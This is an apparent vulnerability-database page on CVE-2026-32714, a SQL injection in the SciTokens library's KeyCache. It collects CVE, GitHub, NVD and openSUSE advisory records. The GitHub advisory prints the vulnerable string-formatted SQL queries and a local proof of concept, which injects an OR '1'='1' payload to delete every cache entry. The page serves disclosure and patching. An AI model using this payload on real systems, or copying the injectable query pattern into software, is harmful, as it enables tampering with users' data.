Vulnerability-Lookup

CVE-2026-32714 (GCVE-0-2026-32714)

Vulnerability from cvelistv5 – Published: 2026-03-31 01:31 – Updated: 2026-03-31 13:58

Title

SciTokens vulnerable to SQL Injection in KeyCache

Summary

SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.6, the KeyCache class in scitokens was vulnerable to SQL Injection because it used Python's str.format() to construct SQL queries with user-supplied data (such as issuer and key_id). This allowed an attacker to execute arbitrary SQL commands against the local SQLite database. This issue has been patched in version 1.9.6.

Severity ?

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	scitokens	scitokens	Affected: < 1.9.6

GHSA-RH5M-2482-966C

Vulnerability from github – Published: 2026-03-31 22:49 – Updated: 2026-03-31 22:49

Summary

SciTokens is vulnerable to SQL Injection in KeyCache

Details

Summary

The KeyCache class in scitokens was vulnerable to SQL Injection because it used Python's str.format() to construct SQL queries with user-supplied data (such as issuer and key_id). This allowed an attacker to execute arbitrary SQL commands against the local SQLite database.

Ran the POC below locally.

Details

File: src/scitokens/utils/keycache.py

Vulnerable Code Snippets

1. In addkeyinfo (around line 74):

curs.execute("DELETE FROM keycache WHERE issuer = '{}' AND key_id = '{}'".format(issuer, key_id))

2. In _addkeyinfo (around lines 89 and 94):

insert_key_statement = "INSERT OR REPLACE INTO keycache VALUES('{issuer}', '{expiration}', '{key_id}', \
                       '{keydata}', '{next_update}')"
# ...
curs.execute(insert_key_statement.format(issuer=issuer, expiration=time.time()+cache_timer, key_id=key_id,
                                         keydata=json.dumps(keydata), next_update=time.time()+next_update))

3. In _delete_cache_entry (around line 128):

curs.execute("DELETE FROM keycache WHERE issuer = '{}' AND key_id = '{}'".format(issuer,
            key_id))

4. In _add_negative_cache_entry (around lines 148 and 152):

insert_key_statement = "INSERT OR REPLACE INTO keycache VALUES('{issuer}', '{expiration}', '{key_id}', \
                    '{keydata}', '{next_update}')"
# ...
curs.execute(insert_key_statement.format(issuer=issuer, expiration=time.time()+cache_retry_interval, key_id=key_id,
                                        keydata=keydata, next_update=time.time()+cache_retry_interval))

5. In getkeyinfo (around lines 193 and 198):

key_query = ("SELECT * FROM keycache WHERE "
             "issuer = '{issuer}'")
# ...
curs.execute(key_query.format(issuer=issuer, key_id=key_id))

PoC

import sqlite3
import os
import sys
import tempfile
import shutil
import time
import json
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization

def poc_sql_injection():
    print("--- PoC: SQL Injection in KeyCache (Vulnerability Demonstration) ---")

    # We will demonstrate the vulnerability by manually executing the kind of query
    # that WAS present in the code, showing how it can be exploited.

    # Setup temporary database
    fd, db_path = tempfile.mkstemp()
    os.close(fd)

    conn = sqlite3.connect(db_path)
    curs = conn.cursor()
    curs.execute("CREATE TABLE keycache (issuer text, expiration integer, key_id text, keydata text, next_update integer, PRIMARY KEY (issuer, key_id))")

    # Add legitimate entries
    curs.execute("INSERT INTO keycache VALUES (?, ?, ?, ?, ?)", ("https://legit1.com", int(time.time())+3600, "key1", "{}", int(time.time())+3600))
    curs.execute("INSERT INTO keycache VALUES (?, ?, ?, ?, ?)", ("https://legit2.com", int(time.time())+3600, "key2", "{}", int(time.time())+3600))
    conn.commit()

    curs.execute("SELECT count(*) FROM keycache")
    print(f"Count before injection: {curs.fetchone()[0]}")

    # MALICIOUS INPUT
    # The original code was: 
    # curs.execute("DELETE FROM keycache WHERE issuer = '{}' AND key_id = '{}'".format(issuer, key_id))

    malicious_issuer = "any' OR '1'='1' --"
    malicious_kid = "irrelevant"

    print(f"Simulating injection with issuer: {malicious_issuer}")

    # This simulates what the VULNERABLE code did:
    query = "DELETE FROM keycache WHERE issuer = '{}' AND key_id = '{}'".format(malicious_issuer, malicious_kid)
    print(f"Generated query: {query}")

    curs.execute(query)
    conn.commit()

    curs.execute("SELECT count(*) FROM keycache")
    count = curs.fetchone()[0]
    print(f"Count after injection: {count}")

    if count == 0:
        print("[VULNERABILITY CONFIRMED] SQL Injection allowed clearing the entire table!")

    conn.close()
    os.remove(db_path)

if __name__ == "__main__":
    poc_sql_injection()

Impact

An attacker who can influence the issuer or key_id (e.g., through a malicious token or issuer endpoint) could: 1. Modify or Delete Cache Entries: Clear the entire key cache or inject malicious keys. 2. Information Leakage: Query other tables or system information if SQLite is configured with certain extensions. 3. Potential RCE: In some configurations, SQLite can be used to achieve Remote Code Execution (e.g., using ATTACH DATABASE to write a malicious file).

MITIGATION AND WORKAROUNDS

Replace string formatting with parameterized queries using the DB-API's placeholder syntax (e.g., ? for SQLite).

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "scitokens"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.9.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32714"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-31T22:49:15Z",
    "nvd_published_at": "2026-03-31T03:15:55Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nThe `KeyCache` class in `scitokens` was vulnerable to SQL Injection because it used Python\u0027s `str.format()` to construct SQL queries with user-supplied data (such as `issuer` and `key_id`). This allowed an attacker to execute arbitrary SQL commands against the local SQLite database.\n\nRan the POC below locally.\n\n### Details\n**File:** `src/scitokens/utils/keycache.py`\n\n### Vulnerable Code Snippets\n\n**1. In `addkeyinfo` (around line 74):**\n```python\ncurs.execute(\"DELETE FROM keycache WHERE issuer = \u0027{}\u0027 AND key_id = \u0027{}\u0027\".format(issuer, key_id))\n```\n\n**2. In `_addkeyinfo` (around lines 89 and 94):**\n```python\ninsert_key_statement = \"INSERT OR REPLACE INTO keycache VALUES(\u0027{issuer}\u0027, \u0027{expiration}\u0027, \u0027{key_id}\u0027, \\\n                       \u0027{keydata}\u0027, \u0027{next_update}\u0027)\"\n# ...\ncurs.execute(insert_key_statement.format(issuer=issuer, expiration=time.time()+cache_timer, key_id=key_id,\n                                         keydata=json.dumps(keydata), next_update=time.time()+next_update))\n```\n\n**3. In `_delete_cache_entry` (around line 128):**\n```python\ncurs.execute(\"DELETE FROM keycache WHERE issuer = \u0027{}\u0027 AND key_id = \u0027{}\u0027\".format(issuer,\n            key_id))\n```\n\n**4. In `_add_negative_cache_entry` (around lines 148 and 152):**\n```python\ninsert_key_statement = \"INSERT OR REPLACE INTO keycache VALUES(\u0027{issuer}\u0027, \u0027{expiration}\u0027, \u0027{key_id}\u0027, \\\n                    \u0027{keydata}\u0027, \u0027{next_update}\u0027)\"\n# ...\ncurs.execute(insert_key_statement.format(issuer=issuer, expiration=time.time()+cache_retry_interval, key_id=key_id,\n                                        keydata=keydata, next_update=time.time()+cache_retry_interval))\n```\n\n**5. In `getkeyinfo` (around lines 193 and 198):**\n```python\nkey_query = (\"SELECT * FROM keycache WHERE \"\n             \"issuer = \u0027{issuer}\u0027\")\n# ...\ncurs.execute(key_query.format(issuer=issuer, key_id=key_id))\n```\n\n\n### PoC\n```\nimport sqlite3\nimport os\nimport sys\nimport tempfile\nimport shutil\nimport time\nimport json\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\n\ndef poc_sql_injection():\n    print(\"--- PoC: SQL Injection in KeyCache (Vulnerability Demonstration) ---\")\n    \n    # We will demonstrate the vulnerability by manually executing the kind of query\n    # that WAS present in the code, showing how it can be exploited.\n    \n    # Setup temporary database\n    fd, db_path = tempfile.mkstemp()\n    os.close(fd)\n    \n    conn = sqlite3.connect(db_path)\n    curs = conn.cursor()\n    curs.execute(\"CREATE TABLE keycache (issuer text, expiration integer, key_id text, keydata text, next_update integer, PRIMARY KEY (issuer, key_id))\")\n    \n    # Add legitimate entries\n    curs.execute(\"INSERT INTO keycache VALUES (?, ?, ?, ?, ?)\", (\"https://legit1.com\", int(time.time())+3600, \"key1\", \"{}\", int(time.time())+3600))\n    curs.execute(\"INSERT INTO keycache VALUES (?, ?, ?, ?, ?)\", (\"https://legit2.com\", int(time.time())+3600, \"key2\", \"{}\", int(time.time())+3600))\n    conn.commit()\n    \n    curs.execute(\"SELECT count(*) FROM keycache\")\n    print(f\"Count before injection: {curs.fetchone()[0]}\")\n    \n    # MALICIOUS INPUT\n    # The original code was: \n    # curs.execute(\"DELETE FROM keycache WHERE issuer = \u0027{}\u0027 AND key_id = \u0027{}\u0027\".format(issuer, key_id))\n    \n    malicious_issuer = \"any\u0027 OR \u00271\u0027=\u00271\u0027 --\"\n    malicious_kid = \"irrelevant\"\n    \n    print(f\"Simulating injection with issuer: {malicious_issuer}\")\n    \n    # This simulates what the VULNERABLE code did:\n    query = \"DELETE FROM keycache WHERE issuer = \u0027{}\u0027 AND key_id = \u0027{}\u0027\".format(malicious_issuer, malicious_kid)\n    print(f\"Generated query: {query}\")\n    \n    curs.execute(query)\n    conn.commit()\n    \n    curs.execute(\"SELECT count(*) FROM keycache\")\n    count = curs.fetchone()[0]\n    print(f\"Count after injection: {count}\")\n    \n    if count == 0:\n        print(\"[VULNERABILITY CONFIRMED] SQL Injection allowed clearing the entire table!\")\n    \n    conn.close()\n    os.remove(db_path)\n\nif __name__ == \"__main__\":\n    poc_sql_injection()\n```\n### Impact\nAn attacker who can influence the `issuer` or `key_id` (e.g., through a malicious token or issuer endpoint) could:\n1.  **Modify or Delete Cache Entries:** Clear the entire key cache or inject malicious keys.\n2.  **Information Leakage:** Query other tables or system information if SQLite is configured with certain extensions.\n3.  **Potential RCE:** In some configurations, SQLite can be used to achieve Remote Code Execution (e.g., using `ATTACH DATABASE` to write a malicious file).\n\n### MITIGATION AND WORKAROUNDS\nReplace string formatting with parameterized queries using the DB-API\u0027s placeholder syntax (e.g., `?` for SQLite).",
  "id": "GHSA-rh5m-2482-966c",
  "modified": "2026-03-31T22:49:15Z",
  "published": "2026-03-31T22:49:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/scitokens/scitokens/security/advisories/GHSA-rh5m-2482-966c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32714"
    },
    {
      "type": "WEB",
      "url": "https://github.com/scitokens/scitokens/commit/3dba108853f2f4a6c0f2325c03779bf083c41cf2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/scitokens/scitokens"
    },
    {
      "type": "WEB",
      "url": "https://github.com/scitokens/scitokens/releases/tag/v1.9.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SciTokens is vulnerable to SQL Injection in KeyCache"
}

FKIE_CVE-2026-32714

Vulnerability from fkie_nvd - Published: 2026-03-31 03:15 - Updated: 2026-04-03 18:01

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/scitokens/scitokens/commit/3dba108853f2f4a6c0f2325c03779bf083c41cf2	Patch
security-advisories@github.com	https://github.com/scitokens/scitokens/releases/tag/v1.9.6	Release Notes
security-advisories@github.com	https://github.com/scitokens/scitokens/security/advisories/GHSA-rh5m-2482-966c	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/scitokens/scitokens/security/advisories/GHSA-rh5m-2482-966c	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	scitokens	scitokens_library	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:scitokens:scitokens_library:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "429A2C44-9B3E-4F01-86BC-818177DD8EF0",
              "versionEndExcluding": "1.9.6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.6, the KeyCache class in scitokens was vulnerable to SQL Injection because it used Python\u0027s str.format() to construct SQL queries with user-supplied data (such as issuer and key_id). This allowed an attacker to execute arbitrary SQL commands against the local SQLite database. This issue has been patched in version 1.9.6."
    },
    {
      "lang": "es",
      "value": "SciTokens es una biblioteca de referencia para generar y usar SciTokens. Antes de la versi\u00f3n 1.9.6, la clase KeyCache en scitokens era vulnerable a la inyecci\u00f3n SQL porque utilizaba str.format() de Python para construir consultas SQL con datos proporcionados por el usuario (como issuer y key_id). Esto permit\u00eda a un atacante ejecutar comandos SQL arbitrarios contra la base de datos SQLite local. Este problema ha sido parcheado en la versi\u00f3n 1.9.6."
    }
  ],
  "id": "CVE-2026-32714",
  "lastModified": "2026-04-03T18:01:22.027",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-31T03:15:55.970",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/scitokens/scitokens/commit/3dba108853f2f4a6c0f2325c03779bf083c41cf2"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/scitokens/scitokens/releases/tag/v1.9.6"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/scitokens/scitokens/security/advisories/GHSA-rh5m-2482-966c"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/scitokens/scitokens/security/advisories/GHSA-rh5m-2482-966c"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

OPENSUSE-SU-2026:10491-1

Vulnerability from csaf_opensuse - Published: 2026-04-04 00:00 - Updated: 2026-04-04 00:00

Summary

python311-scitokens-1.8.1-2.1 on GA media

Severity

Moderate

Notes

Title of the patch: python311-scitokens-1.8.1-2.1 on GA media

Description of the patch: These are all security issues fixed in the python311-scitokens-1.8.1-2.1 package on the GA media of openSUSE Tumbleweed.

Patchnames: openSUSE-Tumbleweed-2026-10491

CVE-2026-32714

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

CVE-2026-32716

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

CVE-2026-32727

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

References

URL

Category

	https://www.suse.com/support/security/rating/	external
	https://ftp.suse.com/pub/projects/security/csaf/o…	self
	https://www.suse.com/security/cve/CVE-2026-32714/	self
	https://www.suse.com/security/cve/CVE-2026-32716/	self
	https://www.suse.com/security/cve/CVE-2026-32727/	self
	https://www.suse.com/security/cve/CVE-2026-32714	external
	https://bugzilla.suse.com/1261203	external
	https://www.suse.com/security/cve/CVE-2026-32716	external
	https://bugzilla.suse.com/1261202	external
	https://www.suse.com/security/cve/CVE-2026-32727	external
	https://bugzilla.suse.com/1261201	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "python311-scitokens-1.8.1-2.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the python311-scitokens-1.8.1-2.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2026-10491",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10491-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-32714 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-32714/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-32716 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-32716/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-32727 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-32727/"
      }
    ],
    "title": "python311-scitokens-1.8.1-2.1 on GA media",
    "tracking": {
      "current_release_date": "2026-04-04T00:00:00Z",
      "generator": {
        "date": "2026-04-04T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2026:10491-1",
      "initial_release_date": "2026-04-04T00:00:00Z",
      "revision_history": [
        {
          "date": "2026-04-04T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-scitokens-1.8.1-2.1.aarch64",
                "product": {
                  "name": "python311-scitokens-1.8.1-2.1.aarch64",
                  "product_id": "python311-scitokens-1.8.1-2.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-scitokens-1.8.1-2.1.aarch64",
                "product": {
                  "name": "python313-scitokens-1.8.1-2.1.aarch64",
                  "product_id": "python313-scitokens-1.8.1-2.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python314-scitokens-1.8.1-2.1.aarch64",
                "product": {
                  "name": "python314-scitokens-1.8.1-2.1.aarch64",
                  "product_id": "python314-scitokens-1.8.1-2.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-scitokens-1.8.1-2.1.ppc64le",
                "product": {
                  "name": "python311-scitokens-1.8.1-2.1.ppc64le",
                  "product_id": "python311-scitokens-1.8.1-2.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python313-scitokens-1.8.1-2.1.ppc64le",
                "product": {
                  "name": "python313-scitokens-1.8.1-2.1.ppc64le",
                  "product_id": "python313-scitokens-1.8.1-2.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python314-scitokens-1.8.1-2.1.ppc64le",
                "product": {
                  "name": "python314-scitokens-1.8.1-2.1.ppc64le",
                  "product_id": "python314-scitokens-1.8.1-2.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-scitokens-1.8.1-2.1.s390x",
                "product": {
                  "name": "python311-scitokens-1.8.1-2.1.s390x",
                  "product_id": "python311-scitokens-1.8.1-2.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python313-scitokens-1.8.1-2.1.s390x",
                "product": {
                  "name": "python313-scitokens-1.8.1-2.1.s390x",
                  "product_id": "python313-scitokens-1.8.1-2.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python314-scitokens-1.8.1-2.1.s390x",
                "product": {
                  "name": "python314-scitokens-1.8.1-2.1.s390x",
                  "product_id": "python314-scitokens-1.8.1-2.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-scitokens-1.8.1-2.1.x86_64",
                "product": {
                  "name": "python311-scitokens-1.8.1-2.1.x86_64",
                  "product_id": "python311-scitokens-1.8.1-2.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-scitokens-1.8.1-2.1.x86_64",
                "product": {
                  "name": "python313-scitokens-1.8.1-2.1.x86_64",
                  "product_id": "python313-scitokens-1.8.1-2.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python314-scitokens-1.8.1-2.1.x86_64",
                "product": {
                  "name": "python314-scitokens-1.8.1-2.1.x86_64",
                  "product_id": "python314-scitokens-1.8.1-2.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-scitokens-1.8.1-2.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.aarch64"
        },
        "product_reference": "python311-scitokens-1.8.1-2.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-scitokens-1.8.1-2.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.ppc64le"
        },
        "product_reference": "python311-scitokens-1.8.1-2.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-scitokens-1.8.1-2.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.s390x"
        },
        "product_reference": "python311-scitokens-1.8.1-2.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-scitokens-1.8.1-2.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.x86_64"
        },
        "product_reference": "python311-scitokens-1.8.1-2.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-scitokens-1.8.1-2.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.aarch64"
        },
        "product_reference": "python313-scitokens-1.8.1-2.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-scitokens-1.8.1-2.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.ppc64le"
        },
        "product_reference": "python313-scitokens-1.8.1-2.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-scitokens-1.8.1-2.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.s390x"
        },
        "product_reference": "python313-scitokens-1.8.1-2.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-scitokens-1.8.1-2.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.x86_64"
        },
        "product_reference": "python313-scitokens-1.8.1-2.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python314-scitokens-1.8.1-2.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.aarch64"
        },
        "product_reference": "python314-scitokens-1.8.1-2.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python314-scitokens-1.8.1-2.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.ppc64le"
        },
        "product_reference": "python314-scitokens-1.8.1-2.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python314-scitokens-1.8.1-2.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.s390x"
        },
        "product_reference": "python314-scitokens-1.8.1-2.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python314-scitokens-1.8.1-2.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.x86_64"
        },
        "product_reference": "python314-scitokens-1.8.1-2.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-32714",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-32714"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.6, the KeyCache class in scitokens was vulnerable to SQL Injection because it used Python\u0027s str.format() to construct SQL queries with user-supplied data (such as issuer and key_id). This allowed an attacker to execute arbitrary SQL commands against the local SQLite database. This issue has been patched in version 1.9.6.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.aarch64",
          "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.ppc64le",
          "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.s390x",
          "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.x86_64",
          "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.aarch64",
          "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.ppc64le",
          "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.s390x",
          "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.x86_64",
          "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.aarch64",
          "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.ppc64le",
          "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.s390x",
          "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-32714",
          "url": "https://www.suse.com/security/cve/CVE-2026-32714"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1261203 for CVE-2026-32714",
          "url": "https://bugzilla.suse.com/1261203"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.x86_64",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.x86_64",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-04T00:00:00Z",
